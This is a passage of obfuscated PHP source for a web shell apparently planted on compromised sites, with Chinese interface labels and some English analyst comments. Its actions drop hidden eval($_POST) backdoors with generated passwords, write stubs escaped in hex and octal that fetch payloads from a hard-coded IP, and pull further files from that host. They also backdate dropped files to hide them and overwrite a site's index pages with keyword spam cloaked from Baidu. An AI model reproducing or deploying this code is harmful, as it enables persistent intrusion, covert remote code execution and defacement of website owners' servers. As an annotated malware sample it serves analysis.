\$('editfrm').submit();\r\n            }\r\n        </script>";
        return $QSO8f;
    }
    public function J0I1z()
    {
        $Jzwra = $this->ddguj;
        $UgLz_ = '';
        $JqKaG = isset($_POST["go"]) ? $_POST["go"] : '';
        if ($JqKaG == "down") {
            $x3CQ0 = $J3Hov = pBm07($_POST["godir"] . "/" . $_POST["govar"]);
            if (!VZO7E($x3CQ0)) {
                $UgLz_ = "<h1>下载文件不存在</h1>";
            }
        }
        if (isset($_FILES["upfile"])) {
            if ($_FILES["upfile"]["name"] == '') {
                $UgLz_ = "<h1>请选择文件</h1>";
            } else {
                $QY5ao = $_POST["rename"] == '' ? $_FILES["upfile"]["name"] : $_POST["rename"];
                $zi0Y0 = $_FILES["upfile"]["tmp_name"];
                $J3Hov = pBM07($Jzwra . $QY5ao);
                $UgLz_ = fivrG($zi0Y0, $J3Hov) ? "<h2>上传文件" . $QY5ao . "成功</h2>" : "<h1>上传文件" . $QY5ao . "失败</h1>";
            }
        }
        if (isset($_POST["act"])) {
            switch ($_POST["act"]) {
                case "a":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        $uLtTd = 0;
                        foreach ($_POST["files"] as $eb_7J) {
                            $uLtTd += @copy(pBm07($Jzwra . $eb_7J), Pbm07($_POST["var"] . "/copy_" . $eb_7J)) ? 1 : 0;
                        }
                        $UgLz_ = $UgLz_ = $uLtTd ? "<h2>共复制 " . $uLtTd . " 个文件到" . $_POST["var"] . "成功</h2>" : "<h1>共复制 " . $uLtTd . " 个文件到" . $_POST["var"] . "失败</h1>";
                    }
                    break;
                case "b":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件</h1>";
                    } else {
                        $uLtTd = 0;
                        foreach ($_POST["files"] as $eb_7J) {
                            $uLtTd += @unlink(pbm07($Jzwra . $eb_7J)) ? 1 : 0;
                        }
                        $UgLz_ = $uLtTd ? "<h2>共删除 " . $uLtTd . " 个文件成功</h2>" : "<h1>共删除 " . $uLtTd . " 个文件失败</h1>";
                    }
                    break;
                case "c":
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        if (!preg_match("/[0-7]{4}\$/", $_POST["var"])) {
                            $UgLz_ = "<h1>属性值错误</h1>";
                        } else {
                            $uLtTd = 0;
                            foreach ($_POST["files"] as $eb_7J) {
                                try {
                                    $uLtTd += @chmod(PbM07($Jzwra . $eb_7J), base_convert($_POST["var"], 8, 10)) ? 1 : 0;
                                } catch (Throwable $yVbeC) {
                                }
                            }
                            $UgLz_ = $uLtTd ? "<h2>共 " . $uLtTd . " 个文件修改属性为" . $_POST["var"] . "成功</h2>" : "<h1>共 " . $uLtTd . " 个文件修改属性为" . $_POST["var"] . "失败</h1>";
                        }
                    }
                    break;
                case "d":
                    // Sets the mtime of the selected files to an operator-supplied timestamp (manual timestomping).
                    if (!$_POST["files"]) {
                        $UgLz_ = "<h1>请选择文件 " . $_POST["var"] . "</h1>";
                    } else {
                        if (!preg_match("/(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)/", $_POST["var"])) {
                            $UgLz_ = "<h1>时间格式错误 " . $_POST["var"] . "</h1>";
                        } else {
                            $uLtTd = 0;
                            foreach ($_POST["files"] as $eb_7J) {
                                $uLtTd += @touch(pbm07($Jzwra . $eb_7J), strtotime($_POST["var"])) ? 1 : 0;
                            }
                            $UgLz_ = $uLtTd ? "<h2>共 " . $uLtTd . " 个文件修改时间为" . $_POST["var"] . "成功</h2>" : "<h1>共 " . $uLtTd . " 个文件修改时间为" . $_POST["var"] . "失败</h1>";
                        }
                    }
                    break;
                case "e":
                    $PfRvL = PbM07($Jzwra . $_POST["var"] . "/");
                    if (file_exists($PfRvL)) {
                        $UgLz_ = "<h1>目录已存在 " . $_POST["var"] . "</h1>";
                    } else {
                        $UgLz_ = @mkdir($PfRvL, 0777) ? "<h2>创建目录 " . $_POST["var"] . " 成功</h2>" : "<h1>创建目录 " . $_POST["var"] . " 失败</h1>";
                    }
                    break;
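                case "f":
                    // Remote fetch: POST "var" is "<URL> [filename]"; the URL's content is handed to LGU3J() in "wb" mode under the current directory.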
                    $rINXt = array("http" => array("timeout" => 30));
                    if (function_exists("stream_context_create")) {
                        $KlQ6w = stream_context_create($rINXt);
                    }
                    $dRqNZ = explode(" ", $_POST["var"]);
                    $s5r3y = @file_get_contents($dRqNZ[0], false, $KlQ6w);
                    $kojAr = explode("/", $dRqNZ[0]);
                    $eb_7J = array_pop($kojAr);
                    if (!empty($dRqNZ[1])) {
                        $eb_7J = $dRqNZ[1];
                    }
                    if ($s5r3y) {
                        if (LGU3J(pbM07($Jzwra . $eb_7J), $s5r3y, "wb")) {
                            $YJnbr = c4GHr($Jzwra);
                            $ipdt9 = 0;
                            if (!empty($YJnbr["file"])) {
                                foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                    if (!$ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    } else {
                                        if (filemtime($cT1oz) < $ipdt9) {
                                            $ipdt9 = filemtime($cT1oz);
                                        }
                                    }
                                }
                            }
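                            // Timestomping: the new file's mtime is set to the oldest mtime among the files c4GHr() returned for this directory,
                            // so sorting by modification time will not surface it.
                            if ($ipdt9) {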
                                @touch(PBM07($Jzwra . $eb_7J), $ipdt9);
                            }
                            chmod(PbM07($Jzwra . $eb_7J), 0755);
                            $UgLz_ = "<h2>下载 " . $eb_7J . " 成功</h2>";
                        } else {
                            "<h1>下载 " . $eb_7J . " 失败</h1>";
                        }
                    } else {
                        $UgLz_ = "<h1>下载失败或不支持下载</h1>";
                    }
                    break;
                case "rf":
                    $kojAr = explode("|x|", $_POST["var"]);
                    if (count($kojAr) != 2) {
                        $UgLz_ = "<h1>输入错误</h1>";
                    } else {
                        $UgLz_ = @rename(PbM07($Jzwra . $kojAr[1]), PbM07($Jzwra . $kojAr[0])) ? "<h2>重命名 " . $kojAr[1] . " 为 " . $kojAr[0] . " 成功</h2>" : "<h1>重命名 " . $kojAr[1] . " 为 " . $kojAr[0] . " 失败</h1>";
                    }
                    break;
                case "pd":
                    $kojAr = explode("|x|", $_POST["var"]);
                    if (count($kojAr) != 2) {
                        $UgLz_ = "<h1>输入错误</h1>";
                    } else {
                        $PfRvL = PBM07($Jzwra . $kojAr[1]);
                        try {
                            @chmod($PfRvL, base_convert($kojAr[0], 8, 10));
                            $QRlUz = true;
                        } catch (Throwable $yVbeC) {
                            $QRlUz = false;
                        }
                        $UgLz_ = $QRlUz ? "<h2>修改" . $kojAr[1] . "属性为" . $kojAr[0] . "成功</h2>" : "<h1>修改" . $kojAr[1] . "属性为" . $kojAr[0] . "失败</h1>";
                    }
                    break;
                case "edit":
                    if (!(isset($_POST["filename"]) && isset($this->N5qPH["filecode"]))) {
                    } else {
                        $UgLz_ = lgU3J($_POST["filename"], $this->N5qPH["filecode"], "w") ? "<h2>保存成功 " . $_POST["filename"] . "</h2>" : "<h1>保存失败 " . $_POST["filename"] . "</h1>";
                    }
                    break;
                case "deltree":
                    $C3hpU = pBM07($Jzwra . $_POST["var"] . "/");
                    if (!file_exists($C3hpU)) {
                        $UgLz_ = "<h1>目录 " . $_POST["var"] . " 不存在</h1>";
                    } else {
                        $UgLz_ = mRf0Q($C3hpU) ? "<h2>删除目录 " . $_POST["var"] . " 成功</h2>" : "<h1>删除目录 " . $_POST["var"] . " 失败</h1>";
                    }
                    break;
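                case "plxiaoma":
                    // Batch dropper: each line of POST "var" is a path under POST "dir". A name containing ".php" is used as the file itself;
                    // any other name is created as a directory that receives a hidden .xm.php.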
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = c4gHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/.xm.php";
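                            }
                            // The hex/octal-escaped strings below decode to ".index_bak.php" and "hxxp://154.204.233[.]162/panel.txt" (defanged):
                            // the dropped stub, when requested, downloads that URL's content into .index_bak.php in its working directory.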
                            file_put_contents($dRqNZ, "<?php file_put_contents(\"\\x2e\\x69\\156\\144\\x65\\170\\x5f\\142\\x61\\x6b\\x2e\\160\\x68\\x70\", file_get_contents (\"\\x68\\x74\\164\\160\\x3a\\57\\57\\x31\\x35\\x34\\56\\62\\x30\\x34\\x2e\\62\\63\\63\\56\\61\\x36\\62\\x2f\\160\\x61\\156\\145\\154\\56\\164\\x78\\164\"));");
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量哥小马 路径:%s", $dRqNZ);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "xiaoma":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = C4Ghr($PfRvL);
                    $ipdt9 = 0;
                    if (!empty($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
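                    $dRqNZ = $PfRvL . "/.xm.php";
                    // Drops a hidden .xm.php holding the same downloader stub as the "plxiaoma" case (target ".index_bak.php", source URL escaped in hex/octal).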
                    file_put_contents($dRqNZ, "<?php file_put_contents(\"\\x2e\\x69\\156\\144\\x65\\170\\x5f\\142\\x61\\x6b\\x2e\\160\\x68\\x70\", file_get_contents (\"\\x68\\x74\\164\\160\\x3a\\57\\57\\x31\\x35\\x34\\56\\62\\x30\\x34\\x2e\\62\\63\\63\\56\\61\\x36\\62\\x2f\\160\\x61\\156\\145\\154\\56\\164\\x78\\164\"));");
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键小M 路径:%s ", $dRqNZ);
                    break;
                case "pldama":
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = c4gHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/.index_bak.php";
                            }
                            file_put_contents($dRqNZ, file_get_contents(V51MD));
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量大M 路径:%s ", $dRqNZ);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "dama":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4gHR($PfRvL);
                    $ipdt9 = 0;
                    if (!empty($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/.index_bak.php";
                    file_put_contents($dRqNZ, file_get_contents(V51MD));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键大M 路径:%s ", $dRqNZ);
                    break;
                case "gxdama":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4GHR($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = V51MD;
                    file_put_contents($dRqNZ, file_get_contents("http://154.204.233.162/panel.txt"));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("更新大M完成 路径:%s", $dRqNZ);
                    break;
                case "plgzl":
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = C4GHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        $DAWrM = mDXRq();
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/gzl.php";
                            }
                            file_put_contents($dRqNZ, "<?php eval(\$_POST[\"" . $DAWrM . "\"]);");
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量GZL 路径:%s 密码:%s", $dRqNZ, $DAWrM);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "gzl":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4gHr($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/gzl.php";
                    $DAWrM = mdxRq();
                    file_put_contents($dRqNZ, "<?php eval(\$_POST[\"" . $DAWrM . "\"]);");
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键GZL 路径:%s 密码:%s", $dRqNZ, $DAWrM);
                    break;
                case "TDK":
                    $PfRvL = FO39n;
                    $YJnbr = c4gHr($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $hKJoi = trim($_POST["var"]);
                    $p9Pgu = $_SERVER["SERVER_PORT"];
                    $IJLc4 = $p9Pgu == "443" ? "https://" : "http://";
                    $QSO8f = cIvGH($IJLc4 . $_SERVER["HTTP_HOST"], 6);
                    if ($QSO8f) {
                        preg_match_all("/<meta(.*?)name=\"keywords\"(.*?)>/i", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            foreach ($GlUYK[0] as $Hzx0E) {
                                $QSO8f = str_replace($Hzx0E, '', $QSO8f);
                            }
                        }
                        preg_match_all("/<meta(.*?)name=\"description\"(.*?)>/i", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            foreach ($GlUYK[0] as $Hzx0E) {
                                $QSO8f = str_replace($Hzx0E, '', $QSO8f);
                            }
                        }
                        preg_match("/<title(.*?)>(.*?)<\\/title>/", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            $YfZ3Q = '';
                            if (!empty($GlUYK[2])) {
                                $YfZ3Q = "<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(\"baidu\") == -1){document.title =\"" . $GlUYK[2] . "\"}</script>";
                                $QSO8f = str_replace($YfZ3Q, '', $QSO8f);
                            }
                            $YfZ3Q .= "\n" . $hKJoi;
                            $QSO8f = str_replace($GlUYK[0], $YfZ3Q, $QSO8f);
                        }
                        file_put_contents($PfRvL . "/index.html", $QSO8f);
                        if (file_exists($PfRvL . "/index.php")) {
                            copy($PfRvL . "/index.php", $PfRvL . "/index_copy.php");
                            if (!file_exists($PfRvL . "/index_copy.php")) {
                                file_put_contents($PfRvL . "/index_copy.php", file_get_contents($PfRvL . "/index.php"));
                            }
                        }
                        file_put_contents($PfRvL . "/index.php", $QSO8f);
                        if ($ipdt9) {
                            @touch($PfRvL . "/index.html", $ipdt9);
                            @touch($PfRvL . "/index.php", $ipdt9);
                        }
                        chmod($PfRvL . "/index.html", 0755);
                        chmod($PfRvL . "/index.php", 0755);
                        $UgLz_ = sprintf("一键TDK完成 %s %s", $PfRvL . "/index.html", $PfRvL . "/index.php");
                    } else {
                        $UgLz_ = sprintf("一键TDK失败 %s 内容获取失败", "http://" . $_SERVER["HTTP_HOST"]);
                    }
                    break;
                case "JSC":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = C4GhR($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/zrty.php";
                    file_put_contents($dRqNZ, file_get_contents("http://154.204.233.162/zrty.txt"));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键JSC 路径:%s", $dRqNZ);
                    break;
            }
        }
        try {
            $RoNtC = substr(decoct(fileperms($Jzwra)), -4);
        } catch (Throwable $yVbeC) {
            $RoNtC = false;
        }
        if (!$RoNtC) {
            $UgLz_ .= "<h1>无法读取目录</h1>";
        }
        $YJnbr = c4ghr($Jzwra);
        $nbzHl = Pbm07("/" . strtr($Jzwra, array(FO39n => '')) . "/");
        $Jzwra = strtr($Jzwra, array("'" => "%27", "\"" => "%22"));
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<div class=\"actall\"><form name=\"frm\" id=\"frm\" method=\"POST\">";
        $QSO8f .= axttQ();
        $QSO8f .= (is_writable($Jzwra) ? "<h2>路径</h2>" : "<h1>路径</h1>") . " <input type=\"text\" name=\"dir\" id=\"dir\" style=\"width:508px;\" value=\"" . PBm07($Jzwra . "/") . "\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"\$('frm').submit();\" style=\"width:50px;\" value=\"转到\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"cd('" . FO39n . "');\" style=\"width:68px;\" value=\"根目录\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"cd('" . k3TER . "');\" style=\"width:68px;\" value=\"程序目录\"> ";
        $QSO8f .= "<select onchange=\"cd(options[selectedIndex].value);\">";
        $QSO8f .= "<option>---特殊目录---</option>";
        $QSO8f .= "<option value=\"C:/RECYCLER/\">Win-RECYCLER</option>";
        $QSO8f .= "<option value=\"C:/\$Recycle.Bin/\">Win-\$Recycle</option>";
        $QSO8f .= "<option value=\"C:/Program Files/\">Win-Program</option>";
        $QSO8f .= "<option value=\"C:/Documents and Settings/All Users/Start Menu/Programs/Startup/\">Win-Startup</option>";
        $QSO8f .= "<option value=\"C:/Documents and Settings/All Users/「开始」菜单/程序/启动/\">Win-启动</option>";
        $QSO8f .= "<option value=\"C:/Windows/Temp/\">Win-TEMP</option>";
        $QSO8f .= "<option value=\"/usr/local/\">Linux-local</option>";
        $QSO8f .= "<option value=\"/tmp/\">Linux-tmp</option>";
        $QSO8f .= "<option value=\"/var/tmp/\">Linux-var</option>";
        $QSO8f .= "<option value=\"/etc/ssh/\">Linux-ssh</option>";
        $QSO8f .= "</select></form></div><div class=\"actall\">";
        $QSO8f .= "<input type=\"button\" value=\"新建文件\" onclick=\"nf('edit','newfile.php');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"创建目录\" onclick=\"txts('目录名','newdir','e');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"下载文件\" onclick=\"txts('下载文件到当前目录','url链接','f');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"批量上传\" onclick=\"go('upfiles','" . $Jzwra . "');\" style=\"width:68px;\"> ";
        $QSO8f .= "<form name=\"upfrm\" id=\"upfrm\" method=\"POST\" enctype=\"multipart/form-data\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $Jzwra . "\">";
        $QSO8f .= "<input type=\"file\" name=\"upfile\" style=\"width:286px;height:21px;\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"\$('upfrm').submit();\" value=\"上传\" style=\"width:50px;\"> ";
        $QSO8f .= "上传重命名为 <input type=\"text\" name=\"rename\" style=\"width:128px;\">";
        $QSO8f .= "</form></div>";
        $QSO8f .= "<form name=\"frm1\" id=\"frm1\" method=\"POST\"><table class=\"tables\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $Jzwra . "\">";
        $QSO8f .= "<input type=\"hidden\" name=\"act\" id=\"act\" value=\"\">";
        $QSO8f .= "<input type=\"hidden\" name=\"var\" id=\"var\" value=\"\">";
        $QSO8f .= "<th><a href=\"javascript:cd('" . dirname($Jzwra) . "/');\">上级目录</a></th><th style=\"width:8%\">操作</th><th style=\"width:5%\">属性</th><th style=\"width:17%\">创建时间</th><th style=\"width:17%\">修改时间</th><th style=\"width:8%\">下载</th>";
        $uMn1i = '';
        $yICDZ = '';
        $CU3_o = $DOdBZ = 0;
        if ($YJnbr) {
            if (isset($YJnbr["dir"])) {
                asort($YJnbr["dir"]);
            }
            if (isset($YJnbr["file"])) {
                asort($YJnbr["file"]);
            }
            if (isset($YJnbr["dir"])) {
                foreach ($YJnbr["dir"] as $PfRvL => $Kes_q) {
                    $IU13H = substr(decoct(fileperms($PfRvL)), -4);
                    $uMn1i = date("Y-m-d H:i:s", filectime($PfRvL));
                    $yICDZ = date("Y-m-d H:i:s", filemtime($PfRvL));
                    $QSO8f .= "<tr>";
                    $QSO8f .= "<td><a href=\"javascript:cd('" . $Jzwra . $Kes_q . "');\"><b> " . strtr($Kes_q, array("%27" => "'", "%22" => "\"")) . "</b></a></td>";
                    $QSO8f .= "<td><a href=\"javascript:dels('" . $Kes_q . "');\">删除</a> ";
                    $QSO8f .= "<a href=\"javascript:acts('" . $Kes_q . "','rf','" . $Kes_q . "');\">改名</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:acts('" . $IU13H . "','pd','" . $Kes_q . "');\">" . $IU13H . "</a></td>";
                    $QSO8f .= "<td>" . $uMn1i . "</td>";
                    $QSO8f .= "<td>" . $yICDZ . "</td>";
                    $QSO8f .= "<td>-</td>";
                    $QSO8f .= "</tr>";
                    $CU3_o++;
                }
            }
            if (isset($YJnbr["file"])) {
                foreach ($YJnbr["file"] as $PfRvL => $Kes_q) {
                    $IU13H = substr(decoct(fileperms($PfRvL)), -4);
                    $uMn1i = date("Y-m-d H:i:s", filectime($PfRvL));
                    $yICDZ = date("Y-m-d H:i:s", filemtime($PfRvL));
                    $T3WIB = IDYFR(filesize($PfRvL));
                    $QSO8f .= "<tr>";
                    $QSO8f .= "<td><input type=\"checkbox\" name=\"files[]\" value=\"" . $Kes_q . "\">  <a target=\"_blank\" href=\"" . $nbzHl . $Kes_q . "\">" . strtr($Kes_q, array("%27" => "'", "%22" => "\"")) . "</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:go('edit','" . $Kes_q . "');\">编辑</a> ";
                    $QSO8f .= "<a href=\"javascript:acts('" . $Kes_q . "','rf','" . $Kes_q . "');\">改名</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:acts('" . $IU13H . "','pd','" . $Kes_q . "');\">" . $IU13H . "</a></td>";
                    $QSO8f .= "<td>" . $uMn1i . "</td>";
                    $QSO8f .= "<td>" . $yICDZ . "</td>";
                    $QSO8f .= "<td align=\"right\"><a style=\"margin-right: 10px;\" href=\"javascript:go('down','" . $Kes_q . "');\">" . $T3WIB . "</a></td>";
                    $QSO8f .= "</tr>";
                    $DOdBZ++;
                }
            }
        }
        unset($YJnbr);
        $QSO8f .= "</table>";
        $QSO8f .= "<div class=\"actall\" style=\"text-align:left;\">";
        $QSO8f .= "<input type=\"checkbox\" id=\"chkall\" name=\"chkall\" value=\"on\" onclick=\"sa(this.form);\"> ";
        $QSO8f .= "<input type=\"button\" value=\"复制\" style=\"width:50px;\" onclick='txts(\"复制路径\",\"" . $Jzwra . "\",\"a\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"删除\" style=\"width:50px;\" onclick='dels(\"b\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"属性\" style=\"width:50px;\" onclick='txts(\"属性值\",\"0666\",\"c\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"时间\" style=\"width:50px;\" onclick='txts(\"修改时间\",\"" . $yICDZ . "\",\"d\");'> ";
        $QSO8f .= "</br>    ";
        $QSO8f .= "<input type=\"button\" value=\"一键小M\" style=\"width:80px;\" onclick='txts(\"一键小M\",\"" . $Jzwra . "\",\"xiaoma\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量小M\" style=\"width:80px;\" onclick='pltexts(\"批量小M\",\"" . $Jzwra . "\",\"plxiaoma\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键大M\" style=\"width:80px;\" onclick='txts(\"一键大M\",\"" . $Jzwra . "\",\"dama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"更新大M\" style=\"width:80px;\" onclick='txts(\"更新大M\",\"" . $Jzwra . "\",\"gxdama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量大M\" style=\"width:80px;\" onclick='pltexts(\"批量大M\",\"" . $Jzwra . "\",\"pldama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键GZL\" style=\"width:80px;\" onclick='txts(\"一键GZL\",\"" . $Jzwra . "\",\"gzl\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量GZL\" style=\"width:80px;\" onclick='pltexts(\"批量GZL\",\"" . $Jzwra . "\",\"plgzl\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键TDK\" style=\"width:80px;\" onclick='pltexts(\"一键TDK\",\"" . $Jzwra . "\",\"TDK\");'> ";
